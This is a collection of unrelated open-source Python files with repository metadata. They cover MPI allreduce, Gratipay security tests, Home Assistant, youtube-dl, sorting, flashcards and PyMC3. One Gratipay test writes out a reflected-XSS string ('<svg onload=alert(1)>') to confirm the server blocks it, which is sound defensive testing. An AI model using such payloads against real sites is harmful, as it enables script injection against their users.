in ``recvbuf`` on each processes and replaces ``recvbuf` with the
computed mean.
Args:
sendbuf (numpy/cupy array): Input arrays.
recvbuf (numpy/cupy array): Output arrays.
"""
if chainer.is_debug():
self._check_ready_to_allreduce(sendbuf, recvbuf)
is_float16 = recvbuf.dtype == numpy.float16
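        # float16 buffers are upcast to float32 for the reduction (MPI
        # implementations generally lack a float16 datatype) and cast back
        # into recvbuf afterwards.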
if sendbuf is None:
buffer_a = mpi4py.MPI.IN_PLACE
elif is_float16:
assert sendbuf.dtype == recvbuf.dtype
buffer_a = _memory_utility.array_to_buffer_object(
sendbuf.astype(numpy.float32))
else:
buffer_a = _memory_utility.array_to_buffer_object(sendbuf)
if is_float16:
array_b32 = recvbuf.astype(numpy.float32)
else:
array_b32 = recvbuf
buffer_b = _memory_utility.array_to_buffer_object(array_b32)
self.mpi_comm.Allreduce(buffer_a, buffer_b)
if is_float16:
xp = chainer.backend.get_array_module(recvbuf)
xp.copyto(recvbuf, array_b32.astype(numpy.float16), casting='no')
recvbuf *= 1.0 / self.mpi_comm.size
if chainer.is_debug():
self._ensure_all_finite(recvbuf)
|
okuta/chainer
|
chainermn/communicators/mpi_communicator_base.py
|
Python
|
mit
| 26,362
| 0
|
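# Usage sketch for the collective primitives above (an illustration, not part
# of the original module). Assumptions: chainermn is installed, the script is
# launched under MPI (e.g. `mpiexec -n 4 python example.py`), and 'naive' is
# one of the stock names accepted by chainermn.create_communicator.
import numpy as np
import chainermn
comm = chainermn.create_communicator('naive')
if comm.rank == 0:
    xs = np.arange(comm.size * 3, dtype=np.float32).reshape(comm.size, 3)
else:
    xs = None  # ignored on non-root ranks
x = comm.scatter(xs)   # each rank receives one row of xs
y = comm.allreduce(x)  # element-wise SUM over all ranks
ys = comm.gather(y)    # tuple of arrays on rank 0, None elsewhere
if comm.rank == 0:
    print([a.shape for a in ys])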
from __future__ import absolute_import, division, print_function, unicode_literals
import struct
import datetime
from aspen import Response
from aspen.http.request import Request
from base64 import urlsafe_b64decode
from cryptography.fernet import Fernet, InvalidToken
from gratipay import security
from gratipay.models.participant import Identity
from gratipay.security.crypto import EncryptingPacker
from gratipay.testing import Harness
from pytest import raises
class RejectNullBytesInURI(Harness):
def test_filters_path(self):
assert self.client.GxT('/f%00/').code == 400
def test_filters_querystring(self):
assert self.client.GxT('/', QUERY_STRING='f%00=bar').code == 400
def test_protects_against_reflected_xss(self):
self.make_package()
assert self.client.GET('/on/npm/foo').code == 200
assert self.client.GxT('/on/npm/foo%00<svg onload=alert(1)>').code == 400
assert self.client.GxT('/on/npm/foo%01<svg onload=alert(1)>').code == 404 # fyi
class OnlyAllowCertainMethodsTests(Harness):
def test_is_installed_properly(self):
assert self.client.hxt('TRaCE', '/').code == 405
def test_allows_certain_methods(self):
for allowed in ('GEt', 'HEaD', 'PosT'):
request = Request(allowed)
assert security.only_allow_certain_methods(request) is None
def test_disallows_a_bunch_of_other_stuff(self):
for disallowed in ('OPTIONS', 'TRACE', 'TRACK', 'PUT', 'DELETE'):
request = Request(disallowed)
response = raises(Response, security.only_allow_certain_methods, request).value
assert response.code == 405
def test_doesnt_choke_error_handling(self):
assert self.client.hit("OPTIONS", "/", raise_immediately=False).code == 405
def test_prevents_csrf_from_choking(self):
assert self.client.PxST('/assets/gratipay.css').code == 405
class AddHeadersToResponseTests(Harness):
def test_sets_x_frame_options(self):
headers = self.client.GET('/about/').headers
assert headers['X-Frame-Options'] == 'SAMEORIGIN'
def test_sets_x_content_type_options(self):
headers = self.client.GET('/about/').headers
assert headers['X-Content-Type-Options'] == 'nosniff'
def test_sets_x_xss_protection(self):
headers = self.client.GET('/about/').headers
assert headers['X-XSS-Protection'] == '1; mode=block'
def test_sets_referrer_policy(self):
headers = self.client.GET('/about/').headers
assert headers['Referrer-Policy'] == \
'no-referrer-when-downgrade, strict-origin-when-cross-origin'
def test_sets_strict_transport_security(self):
headers = self.client.GET('/about/').headers
assert headers['strict-transport-security'] == 'max-age=31536000'
def test_doesnt_set_content_security_policy_by_default(self):
assert 'content-security-policy-report-only' not in self.client.GET('/about/').headers
def test_sets_content_security_policy(self):
with self.setenv(CSP_REPORT_URI='http://cheese/'):
headers = self.client.GET('/about/').headers
policy = (
"default-src 'self';"
"script-src 'self' assets.gratipay.com 'unsafe-inline';"
"style-src 'self' assets.gratipay.com downloads.gratipay.com cloud.typography.com"
" 'sha256-WLocK7HeCKzQLS0M+PGS++5IhyfFsOA5N4ZCeTcltoo=';"
"img-src *;"
"font-src 'self' assets.gratipay.com cloud.typography.com data:;"
"block-all-mixed-content;"
"report-uri http://cheese/;"
)
assert headers['content-security-policy-report-only'] == policy
class EncryptingPackerTests(Harness):
packed = b'gAAAAABXJMbdriJ984uMCMKfQ5p2UUNHB1vG43K_uJyzUffbu2Uwy0d71kAnqOKJ7Ww_FEQz9Dliw87UpM'\
b'5TdyoJsll5nMAicg=='
def test_packs_encryptingly(self):
packed = Identity.encrypting_packer.pack({"foo": "bar"})
assert urlsafe_b64decode(packed)[0] == b'\x80' # Fernet version
def test_unpacks_decryptingly(self):
assert Identity.encrypting_packer.unpack(self.packed) == {"foo": "bar"}
def test_fails_to_unpack_old_data_with_a_new_key(self):
encrypting_packer = EncryptingPacker(Fernet.generate_key())
raises(InvalidToken, encrypting_packer.unpack, self.packed)
def test_can_unpack_if_old_key_is_provided(self):
old_key = str(self.client.website.env.crypto_keys)
encrypting_packer = EncryptingPacker(Fernet.generate_key(), old_key)
assert encrypting_packer.unpack(self.packed) == {"foo": "bar"}
def test_leaks_timestamp_derp(self):
# https://github.com/pyca/cryptography/issues/2714
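        # A Fernet token is: 1 version byte (0x80), an 8-byte big-endian
        # timestamp, a 16-byte IV, the ciphertext, and a 32-byte HMAC;
        # only the timestamp is readable without the key, as unpacked below.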
timestamp, = struct.unpack(">Q", urlsafe_b64decode(self.packed)[1:9]) # unencrypted!
assert datetime.datetime.fromtimestamp(timestamp).year == 2016
def test_demands_bytes(self):
raises(TypeError, Identity.encrypting_packer.unpack, buffer('buffer'))
raises(TypeError, Identity.encrypting_packer.unpack, 'unicode')
|
gratipay/gratipay.com
|
tests/py/test_security.py
|
Python
|
mit
| 5,176
| 0.002705
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from django.conf.urls import url
from .views import HomePageView, LeaderboardView, MiscView, Sign_upView
urlpatterns = [
url(r'^$', HomePageView.as_view(), name='home'),
url(r'^misc$', MiscView.as_view(), name='misc'),
url(r'^leaderboard$', LeaderboardView.as_view(), name='leaderboard'),
url(r'^login$', Sign_upView.as_view(), name='login'),
]
|
echopen/PRJ-medtec_sigproc
|
echopen-leaderboard/bootcamp/leaderboard/urls.py
|
Python
|
mit
| 466
| 0
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import pytak.call as call
import pytak.runners.tools as tools
from fakeapi import CreateTag
from fakeapi import GetInformationAboutYourself
from fakeapi import CreateAPost
new_request_body = {
"title" : "New Employee [XXXXX]",
"body" : "Please welcome our new employee. Pytak tag - [DDDD]",
"type" : "TEXT",
"permissions" : {
"principal" : {
"id" : "12345",
"resource" : "http://example.com/schema/1.0/user"
},
"permissionFlags" : {
"view" : "true",
"edit" : "false",
"comment" : "true",
"share" : "true",
"authorize" :"false"
}
},
"tags" : [ {"name" : "tag2" }, { "name" : "tag3" }, { "name" : "tag4" } ]
}
def test_randomize_text():
txt = "JSON value with [XXXX] and [DDDD]"
assert txt != call.randomize_text(txt)
def test_random_int_length():
dig = call.__get_random_int(4)
assert len(str(dig)) == 4
def test_random_alphanum_length():
alphnum = call.__get_random_alphanumeric(4)
assert len(alphnum) == 4
def test_api_object_request_body_creation():
ct = CreateTag()
ct2 = CreateTag(assign={'name':'first'})
assert ct.request_body == ct2.request_body
def test_api_object_request_body_manipulation_with_empty():
ct = CreateTag()
ct2 = CreateTag(assign={'name':'second'})
tools.form_request_body(ct2)
assert ct.request_body != ct2.request_body
def test_api_object_request_body_manipulation_with_change():
ct = CreateTag(assign={'name':'one'})
ct2 = CreateTag(assign={'name':'two'})
tools.form_request_body(ct2)
assert ct.request_body != ct2.request_body
def test_url_rewrite():
your_information = GetInformationAboutYourself() + "fields=id,screenName,fullName"
assert your_information.uri == "/api/muad/rest/users/@me?fields=id,screenName,fullName"
def test_request_body_rewrite():
CreateAPost() << new_request_body
def test_assign_randomization():
create_tag = CreateTag(assign={"name" : "pytak-[XXXX]"})
assert create_tag.assign != {"name" : "pytak-[XXXX]"}
def test_request_body_randomization():
create_post = CreateAPost() << new_request_body
print(create_post.request_body)
|
zlatozar/pytak
|
pytak/tests/call_test.py
|
Python
|
bsd-3-clause
| 2,316
| 0.018566
|
class Solution(object):
def containsNearbyAlmostDuplicate(self, nums, k, t):
"""
:type nums: List[int]
:type k: int
:type t: int
:rtype: bool
"""
if k < 1 or t < 0:
return False
dic = {}
t += 1
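        # Bucket trick: after the increment, each bucket nums[i] // t spans t
        # consecutive values, so two numbers in the same bucket differ by at
        # most the original t; only the two adjacent buckets can also hold a
        # value within t, which keeps each step O(1).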
for i in range(len(nums)):
if i > k:
del dic[nums[i - k - 1] // t]
m = nums[i] // t
if m in dic:
return True
if m - 1 in dic and abs(nums[i] - dic[m - 1]) < t:
return True
if m + 1 in dic and abs(nums[i] - dic[m + 1]) < t:
return True
dic[m] = nums[i]
return False
test = Solution()
print(test.containsNearbyAlmostDuplicate([1, 3, 1], 1, 1))
|
rx2130/Leetcode
|
python/220 Contains Duplicate III.py
|
Python
|
apache-2.0
| 777
| 0.001287
|
"""Support for Wireless Sensor Tags."""
import logging
from requests.exceptions import ConnectTimeout, HTTPError
import voluptuous as vol
from wirelesstagpy import NotificationConfig as NC
from homeassistant import util
from homeassistant.const import (
ATTR_BATTERY_LEVEL,
ATTR_VOLTAGE,
CONF_PASSWORD,
CONF_USERNAME,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.dispatcher import dispatcher_send
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
# Strength of signal in dBm
ATTR_TAG_SIGNAL_STRENGTH = "signal_strength"
# Indicates if tag is out of range or not
ATTR_TAG_OUT_OF_RANGE = "out_of_range"
# Number in percents from max power of tag receiver
ATTR_TAG_POWER_CONSUMPTION = "power_consumption"
NOTIFICATION_ID = "wirelesstag_notification"
NOTIFICATION_TITLE = "Wireless Sensor Tag Setup"
DOMAIN = "wirelesstag"
DEFAULT_ENTITY_NAMESPACE = "wirelesstag"
# Template for signal - first parameter is tag_id,
# second, tag manager mac address
SIGNAL_TAG_UPDATE = "wirelesstag.tag_info_updated_{}_{}"
# Template for signal - tag_id, sensor type and
# tag manager mac address
SIGNAL_BINARY_EVENT_UPDATE = "wirelesstag.binary_event_updated_{}_{}_{}"
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
}
)
},
extra=vol.ALLOW_EXTRA,
)
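# Example configuration.yaml entry (illustrative credentials only):
#
# wirelesstag:
#   username: you@example.com
#   password: YOUR_PASSWORD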
class WirelessTagPlatform:
"""Principal object to manage all registered in HA tags."""
def __init__(self, hass, api):
"""Designated initializer for wirelesstags platform."""
self.hass = hass
self.api = api
self.tags = {}
self._local_base_url = None
@property
def tag_manager_macs(self):
"""Return list of tag managers mac addresses in user account."""
return self.api.mac_addresses
def load_tags(self):
"""Load tags from remote server."""
self.tags = self.api.load_tags()
return self.tags
def arm(self, switch):
"""Arm entity sensor monitoring."""
func_name = f"arm_{switch.sensor_type}"
arm_func = getattr(self.api, func_name)
if arm_func is not None:
arm_func(switch.tag_id, switch.tag_manager_mac)
def disarm(self, switch):
"""Disarm entity sensor monitoring."""
func_name = f"disarm_{switch.sensor_type}"
disarm_func = getattr(self.api, func_name)
if disarm_func is not None:
disarm_func(switch.tag_id, switch.tag_manager_mac)
def make_notifications(self, binary_sensors, mac):
"""Create configurations for push notifications."""
_LOGGER.info("Creating configurations for push notifications.")
configs = []
bi_url = self.binary_event_callback_url
for bi_sensor in binary_sensors:
configs.extend(bi_sensor.event.build_notifications(bi_url, mac))
update_url = self.update_callback_url
update_config = NC.make_config_for_update_event(update_url, mac)
configs.append(update_config)
return configs
def install_push_notifications(self, binary_sensors):
"""Register local push notification from tag manager."""
_LOGGER.info("Registering local push notifications.")
for mac in self.tag_manager_macs:
configs = self.make_notifications(binary_sensors, mac)
# install notifications for all tags in tag manager
# specified by mac
result = self.api.install_push_notification(0, configs, True, mac)
if not result:
self.hass.components.persistent_notification.create(
"Error: failed to install local push notifications <br />",
title="Wireless Sensor Tag Setup Local Push Notifications",
notification_id="wirelesstag_failed_push_notification",
)
else:
_LOGGER.info(
"Installed push notifications for all\
tags in %s.",
mac,
)
@property
def local_base_url(self):
"""Define base url of hass in local network."""
if self._local_base_url is None:
self._local_base_url = "http://{}".format(util.get_local_ip())
port = self.hass.config.api.port
if port is not None:
self._local_base_url += f":{port}"
return self._local_base_url
@property
def update_callback_url(self):
"""Return url for local push notifications(update event)."""
return f"{self.local_base_url}/api/events/wirelesstag_update_tags"
@property
def binary_event_callback_url(self):
"""Return url for local push notifications(binary event)."""
return f"{self.local_base_url}/api/events/wirelesstag_binary_event"
def handle_update_tags_event(self, event):
"""Handle push event from wireless tag manager."""
_LOGGER.info("push notification for update arrived: %s", event)
try:
tag_id = event.data.get("id")
mac = event.data.get("mac")
dispatcher_send(self.hass, SIGNAL_TAG_UPDATE.format(tag_id, mac), event)
except Exception as ex: # pylint: disable=broad-except
_LOGGER.error(
"Unable to handle tag update event:\
%s error: %s",
str(event),
str(ex),
)
def handle_binary_event(self, event):
"""Handle push notifications for binary (on/off) events."""
_LOGGER.info("Push notification for binary event arrived: %s", event)
try:
tag_id = event.data.get("id")
event_type = event.data.get("type")
mac = event.data.get("mac")
dispatcher_send(
self.hass,
SIGNAL_BINARY_EVENT_UPDATE.format(tag_id, event_type, mac),
event,
)
except Exception as ex: # pylint: disable=broad-except
_LOGGER.error(
"Unable to handle tag binary event:\
%s error: %s",
str(event),
str(ex),
)
def setup(hass, config):
"""Set up the Wireless Sensor Tag component."""
conf = config[DOMAIN]
username = conf.get(CONF_USERNAME)
password = conf.get(CONF_PASSWORD)
try:
from wirelesstagpy import WirelessTags, WirelessTagsException
wirelesstags = WirelessTags(username=username, password=password)
platform = WirelessTagPlatform(hass, wirelesstags)
platform.load_tags()
hass.data[DOMAIN] = platform
except (ConnectTimeout, HTTPError, WirelessTagsException) as ex:
_LOGGER.error("Unable to connect to wirelesstag.net service: %s", str(ex))
hass.components.persistent_notification.create(
"Error: {}<br />" "Please restart hass after fixing this." "".format(ex),
title=NOTIFICATION_TITLE,
notification_id=NOTIFICATION_ID,
)
return False
# listen to custom events
hass.bus.listen(
"wirelesstag_update_tags", hass.data[DOMAIN].handle_update_tags_event
)
hass.bus.listen("wirelesstag_binary_event", hass.data[DOMAIN].handle_binary_event)
return True
class WirelessTagBaseSensor(Entity):
"""Base class for HA implementation for Wireless Sensor Tag."""
def __init__(self, api, tag):
"""Initialize a base sensor for Wireless Sensor Tag platform."""
self._api = api
self._tag = tag
self._uuid = self._tag.uuid
self.tag_id = self._tag.tag_id
self.tag_manager_mac = self._tag.tag_manager_mac
self._name = self._tag.name
self._state = None
@property
def should_poll(self):
"""Return the polling state."""
return True
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def principal_value(self):
"""Return base value.
Subclasses need override based on type of sensor.
"""
return 0
def updated_state_value(self):
"""Return formatted value.
The default implementation formats principal value.
"""
return self.decorate_value(self.principal_value)
# pylint: disable=no-self-use
def decorate_value(self, value):
"""Decorate input value to be well presented for end user."""
return f"{value:.1f}"
@property
def available(self):
"""Return True if entity is available."""
return self._tag.is_alive
def update(self):
"""Update state."""
if not self.should_poll:
return
updated_tags = self._api.load_tags()
updated_tag = updated_tags[self._uuid]
if updated_tag is None:
_LOGGER.error('Unable to update tag: "%s"', self.name)
return
self._tag = updated_tag
self._state = self.updated_state_value()
@property
def device_state_attributes(self):
"""Return the state attributes."""
return {
ATTR_BATTERY_LEVEL: int(self._tag.battery_remaining * 100),
ATTR_VOLTAGE: f"{self._tag.battery_volts:.2f}V",
ATTR_TAG_SIGNAL_STRENGTH: f"{self._tag.signal_strength}dBm",
ATTR_TAG_OUT_OF_RANGE: not self._tag.is_in_range,
ATTR_TAG_POWER_CONSUMPTION: f"{self._tag.power_consumption:.2f}%",
}
|
leppa/home-assistant
|
homeassistant/components/wirelesstag/__init__.py
|
Python
|
apache-2.0
| 9,650
| 0.000415
|
'''
Python program for implementation of Merge Sort
l is left index, m is middle index and r is right index
L[l...m] and R[m+1.....r] are respective left and right sub-arrays
'''
def merge(arr, l, m, r):
n1 = m - l + 1
n2 = r-m
#create temporary arrays
L = [0]*(n1)
R = [0]*(n2)
#Copy data to temp arrays L[] and R[]
for i in range(0, n1):
L[i] = arr[l + i]
for j in range(0, n2):
R[j] = arr[m+1+j]
# Merge the temp array back into arr[l...r]
i = 0 # Initial index of first subarray
j = 0 # Initial index of second subarray
k = l # Initial index of merged subarray
#Comparing the elements of the array and filling them into one array
while i < n1 and j < n2 :
if L[i] <= R[j] :
arr[k] = L[i]
i += 1
else:
arr[k] = R[j]
j += 1
k += 1
# Copy the remaining element of L[], if there are any
while i < n1:
arr[k] = L[i]
i += 1
k += 1
# Copy the remaining element of R[], if there are any
while j < n2:
        arr[k] = R[j]
j += 1
k += 1
# l is for left index and r is for right index of the
# subarray of arr to be sorted
def mergeSort(arr, l, r):
if l < r:
        # Midpoint; written this way to avoid overflow for large l and r
        m = (l+(r-1))//2
# Sort first and second halves
mergeSort(arr, l, m)
mergeSort(arr, m+1, r)
merge(arr, l, m, r)
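# Minimal driver (not part of the original snippet) showing the expected call
# pattern: sort arr[0..len(arr)-1] in place.
if __name__ == '__main__':
    data = [12, 11, 13, 5, 6, 7]
    mergeSort(data, 0, len(data) - 1)
    print(data)  # -> [5, 6, 7, 11, 12, 13]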
|
tannmay/Algorithms-1
|
Sorting/Codes/mergeSort.py
|
Python
|
gpl-3.0
| 1,313
| 0.007616
|
# coding: utf-8
from __future__ import unicode_literals
import re
from .adobepass import AdobePassIE
from ..utils import (
int_or_none,
determine_ext,
parse_age_limit,
urlencode_postdata,
ExtractorError,
)
class GoIE(AdobePassIE):
_SITE_INFO = {
'abc': {
'brand': '001',
'requestor_id': 'ABC',
},
'freeform': {
'brand': '002',
'requestor_id': 'ABCFamily',
},
'watchdisneychannel': {
'brand': '004',
'requestor_id': 'Disney',
},
'watchdisneyjunior': {
'brand': '008',
'requestor_id': 'DisneyJunior',
},
'watchdisneyxd': {
'brand': '009',
'requestor_id': 'DisneyXD',
}
}
_VALID_URL = r'https?://(?:(?P<sub_domain>%s)\.)?go\.com/(?:[^/]+/)*(?:vdka(?P<id>\w+)|season-\d+/\d+-(?P<display_id>[^/?#]+))' % '|'.join(_SITE_INFO.keys())
_TESTS = [{
'url': 'http://abc.go.com/shows/castle/video/most-recent/vdka0_g86w5onx',
'info_dict': {
'id': '0_g86w5onx',
'ext': 'mp4',
'title': 'Sneak Peek: Language Arts',
'description': 'md5:7dcdab3b2d17e5217c953256af964e9c',
},
'params': {
# m3u8 download
'skip_download': True,
},
}, {
'url': 'http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601',
'only_matching': True,
}]
def _real_extract(self, url):
sub_domain, video_id, display_id = re.match(self._VALID_URL, url).groups()
if not video_id:
webpage = self._download_webpage(url, display_id)
video_id = self._search_regex(
# There may be inner quotes, e.g. data-video-id="'VDKA3609139'"
# from http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood
r'data-video-id=["\']*VDKA(\w+)', webpage, 'video id')
site_info = self._SITE_INFO[sub_domain]
brand = site_info['brand']
video_data = self._download_json(
'http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json' % (brand, video_id),
video_id)['video'][0]
title = video_data['title']
formats = []
for asset in video_data.get('assets', {}).get('asset', []):
asset_url = asset.get('value')
if not asset_url:
continue
format_id = asset.get('format')
ext = determine_ext(asset_url)
if ext == 'm3u8':
video_type = video_data.get('type')
if video_type == 'lf':
data = {
'video_id': video_data['id'],
'video_type': video_type,
'brand': brand,
'device': '001',
}
if video_data.get('accesslevel') == '1':
requestor_id = site_info['requestor_id']
resource = self._get_mvpd_resource(
requestor_id, title, video_id, None)
auth = self._extract_mvpd_auth(
url, video_id, requestor_id, resource)
data.update({
'token': auth,
'token_type': 'ap',
'adobe_requestor_id': requestor_id,
})
entitlement = self._download_json(
'https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json',
video_id, data=urlencode_postdata(data), headers=self.geo_verification_headers())
errors = entitlement.get('errors', {}).get('errors', [])
if errors:
error_message = ', '.join([error['message'] for error in errors])
raise ExtractorError('%s said: %s' % (self.IE_NAME, error_message), expected=True)
asset_url += '?' + entitlement['uplynkData']['sessionKey']
formats.extend(self._extract_m3u8_formats(
asset_url, video_id, 'mp4', m3u8_id=format_id or 'hls', fatal=False))
else:
formats.append({
'format_id': format_id,
'url': asset_url,
'ext': ext,
})
self._sort_formats(formats)
subtitles = {}
for cc in video_data.get('closedcaption', {}).get('src', []):
cc_url = cc.get('value')
if not cc_url:
continue
ext = determine_ext(cc_url)
if ext == 'xml':
ext = 'ttml'
subtitles.setdefault(cc.get('lang'), []).append({
'url': cc_url,
'ext': ext,
})
thumbnails = []
for thumbnail in video_data.get('thumbnails', {}).get('thumbnail', []):
thumbnail_url = thumbnail.get('value')
if not thumbnail_url:
continue
thumbnails.append({
'url': thumbnail_url,
'width': int_or_none(thumbnail.get('width')),
'height': int_or_none(thumbnail.get('height')),
})
return {
'id': video_id,
'title': title,
'description': video_data.get('longdescription') or video_data.get('description'),
'duration': int_or_none(video_data.get('duration', {}).get('value'), 1000),
'age_limit': parse_age_limit(video_data.get('tvrating', {}).get('rating')),
'episode_number': int_or_none(video_data.get('episodenumber')),
'series': video_data.get('show', {}).get('title'),
'season_number': int_or_none(video_data.get('season', {}).get('num')),
'thumbnails': thumbnails,
'formats': formats,
'subtitles': subtitles,
}
|
israeltobias/DownMedia
|
youtube-dl/youtube_dl/extractor/go.py
|
Python
|
gpl-3.0
| 6,104
| 0.002457
|
#!/usr/bin/env python3
# Review Lines from the Selected Deck in Random Order Until All Pass
# Written in 2012 by 伴上段
#
# To the extent possible under law, the author(s) have dedicated all copyright
# and related and neighboring rights to this software to the public domain
# worldwide. This software is distributed without any warranty.
#
# You should have received a copy of the CC0 Public Domain Dedication along
# with this software. If not, see
# <http://creativecommons.org/publicdomain/zero/1.0/>.
from argparse import *
from csv import *
from datetime import *
from os.path import *
from random import *
from sys import *
def Main(deckfile, logfile, commandfile, field_sep, date_format, is_dry_run, use_sm2):
ret = 0
if isinstance(deckfile, str) and not exists(deckfile):
stderr.write("deck file does not exist: " + deckfile + "\n")
ret = 1
if not exists(logfile):
stderr.write("log file does not exist: " + logfile + "\n")
ret = 1
if not exists(commandfile):
stderr.write("command file (pipe?) does not exist: " + commandfile + "\n")
ret = 1
if ret != 0:
    return 1
reviewing_cards = []
failed_cards = []
deckf = None
try:
deckf = (open(deckfile, 'r') if isinstance(deckfile, str) else deckfile)
for fields in reader(deckf, delimiter=field_sep):
if len(fields) != 0:
reviewing_cards.append([fields[0], field_sep.join(fields), False])
finally:
if deckf is not None:
deckf.close()
def logreview(logf, card, command):
logf.write(card[0] + field_sep + datetime.now().strftime(date_format) + field_sep + command)
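  # Each log record is "<card ID><sep><timestamp><sep><result>\n"; the command
  # passed in already carries its trailing newline from readline().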
sm2_commands = set(str(v) + "\n" for v in range(6))
shuffle(reviewing_cards)
with open(commandfile, 'r') as commandf:
with open(logfile, 'a') as logf:
while reviewing_cards or failed_cards:
if not reviewing_cards:
reviewing_cards, failed_cards = failed_cards, reviewing_cards
shuffle(reviewing_cards)
card = reviewing_cards.pop()
stdout.write(card[1] + "\n")
stdout.flush()
command = commandf.readline()
if use_sm2:
if command in sm2_commands:
if not (is_dry_run or card[-1]):
logreview(logf, card, command)
if int(command[0:1]) < 3:
card[-1] = True
failed_cards.append(card)
elif command == "q\n":
return 0
else:
stderr.write("unrecognized command: " + command + "\n")
return 2
else:
# Leitner system
if command == "+\n":
if not (is_dry_run or card[-1]):
logreview(logf, card, "+\n")
elif command == "-\n":
if not is_dry_run:
logreview(logf, card, "-\n")
card[-1] = True
failed_cards.append(card)
elif command.lower() == "q\n":
return 0
else:
stderr.write("unrecognized command: " + command + "\n")
return 2
logf.flush()
return 0
if __name__ == "__main__":
parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter, description=""" Review lines from standard input as though they were flashcards
and log the results. Both standard input and the specified log file must be
CSV files with the same field separator character, which is specified via -s.
This program works with either the Leitner system or the SuperMemo algorithm,
version 2 (SM-2).
formatting:
This program treats the first field of each nonempty line from the deck as
that line's unique ID; otherwise, this program is agnostic about formatting.
New log file entries will have this format:
<ID> <field-separator> <timestamp> <field-separator> <result>
where <ID> is the unique ID of the line (card) associated with the record,
<field-separator> is the CSV field separator, <timestamp> is the record's
timestamp (you can modify its format via the -f option), and <result> is the
result of the review.
For Leitner-system-based reviews, <result> is either '+' or '-'.
'+' indicates that the user passed the review at the specified time, whereas
'-' indicates that the user failed at the specified time.
For SM-2-based reviews, <result> is an integer in the range [0,5] indicating
the "quality of review response" that the user provided. (0 indicates a
complete memory blackout whereas 5 means the review was a piece of cake.)
output:
This program shuffles lines and prints them to standard output one at a time
in CSV format. After printing a card, this program will wait for a command
from the specified command file. Commands are single-word lines
terminated by standard newline (\\n) characters. For Leitner-system-based
reviews, the commands are:
+ the user passed the card
- the user didn't pass the card
q the user is terminating the quiz
For SM-2-based reviews, the commands are:
0 quality of review response 0
1 quality of review response 1
2 quality of review response 2
3 quality of review response 3
4 quality of review response 4
5 quality of review response 5
q the user is terminating the quiz
All other values are erroneous.""")
parser.add_argument("-d", "--dry-run", default=False, action="store_true", help="don't log the results of the review")
parser.add_argument("-f", "--date-format", default="%Y年%m月%d日", help="the format of dates/timestamps in the log file (uses date/strftime flags, default: %%Y年%%m月%%d日)")
parser.add_argument("-s", "--field-sep", default="\t", help="the CSV field separator (default: \\t)")
parser.add_argument("-2", "--use-sm2", default=False, action="store_true", help="use the SM-2 algorithm instead of the Leitner system")
parser.add_argument("commandfile", help="a file (usually a named pipe) providing review commands")
parser.add_argument("logfile", help="a CSV-formatted file containing records for the deck's lines")
args = parser.parse_args()
try:
ret = Main(stdin, args.logfile, args.commandfile, args.field_sep, args.date_format, args.dry_run, args.use_sm2)
except KeyboardInterrupt:
ret = 0
exit(ret)
|
jtvaughan/oboeta
|
oboeta.py
|
Python
|
cc0-1.0
| 6,217
| 0.009356
|
from pymc3 import *
import theano.tensor as t
from theano.tensor.nlinalg import matrix_inverse as inv
import numpy as np
from numpy import array, diag, linspace
from numpy.random import multivariate_normal
# Generate some multivariate normal data:
n_obs = 1000
# Mean values:
mu = linspace(0, 2, num=4)
n_var = len(mu)
# Standard deviations:
stds = np.ones(4) / 2.0
# Correlation matrix of 4 variables:
corr = array([[ 1. , 0.75, 0. , 0.15],
[ 0.75, 1. , -0.06, 0.19],
[ 0. , -0.06, 1. , -0.04],
[ 0.15, 0.19, -0.04, 1. ]])
cov_matrix = diag(stds).dot(corr.dot(diag(stds)))
dataset = multivariate_normal(mu, cov_matrix, size=n_obs)
# In order to convert the upper triangular correlation values to a complete
# correlation matrix, we need to construct an index matrix:
n_elem = n_var * (n_var - 1) // 2
tri_index = np.zeros([n_var, n_var], dtype=int)
tri_index[np.triu_indices(n_var, k=1)] = np.arange(n_elem)
tri_index[np.triu_indices(n_var, k=1)[::-1]] = np.arange(n_elem)
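# For n_var = 4 this gives
#   tri_index = [[0, 0, 1, 2],
#                [0, 0, 3, 4],
#                [1, 3, 0, 5],
#                [2, 4, 5, 0]]
# so corr_triangle[tri_index] tiles the 6 packed correlations into a full
# symmetric matrix; the (wrong) diagonal entries are overwritten with ones
# by fill_diagonal below.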
with Model() as model:
mu = Normal('mu', mu=0, tau=1 ** -2, shape=n_var)
# We can specify separate priors for sigma and the correlation matrix:
sigma = Uniform('sigma', shape=n_var)
corr_triangle = LKJCorr('corr', n=1, p=n_var)
corr_matrix = corr_triangle[tri_index]
corr_matrix = t.fill_diagonal(corr_matrix, 1)
cov_matrix = t.diag(sigma).dot(corr_matrix.dot(t.diag(sigma)))
like = MvNormal('likelihood', mu=mu, tau=inv(cov_matrix), observed=dataset)
def run(n=1000):
if n == "short":
n = 50
with model:
start = find_MAP()
step = NUTS(scaling=start)
tr = sample(n, step=step, start=start)
if __name__ == '__main__':
run()
|
MCGallaspy/pymc3
|
pymc3/examples/LKJ_correlation.py
|
Python
|
apache-2.0
| 1,729
| 0.00694
|
# Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: vraj@reciprocitylabs.com
# Maintained By: vraj@reciprocitylabs.com
"""Defines a Revision model for storing snapshots."""
from ggrc import db
from ggrc.models.computed_property import computed_property
from ggrc.models.mixins import Base
from ggrc.models.types import JsonType
class Revision(Base, db.Model):
"""Revision object holds a JSON snapshot of the object at a time."""
__tablename__ = 'revisions'
resource_id = db.Column(db.Integer, nullable=False)
resource_type = db.Column(db.String, nullable=False)
event_id = db.Column(db.Integer, db.ForeignKey('events.id'), nullable=False)
action = db.Column(db.Enum(u'created', u'modified', u'deleted'),
nullable=False)
content = db.Column(JsonType, nullable=False)
source_type = db.Column(db.String, nullable=True)
source_id = db.Column(db.Integer, nullable=True)
destination_type = db.Column(db.String, nullable=True)
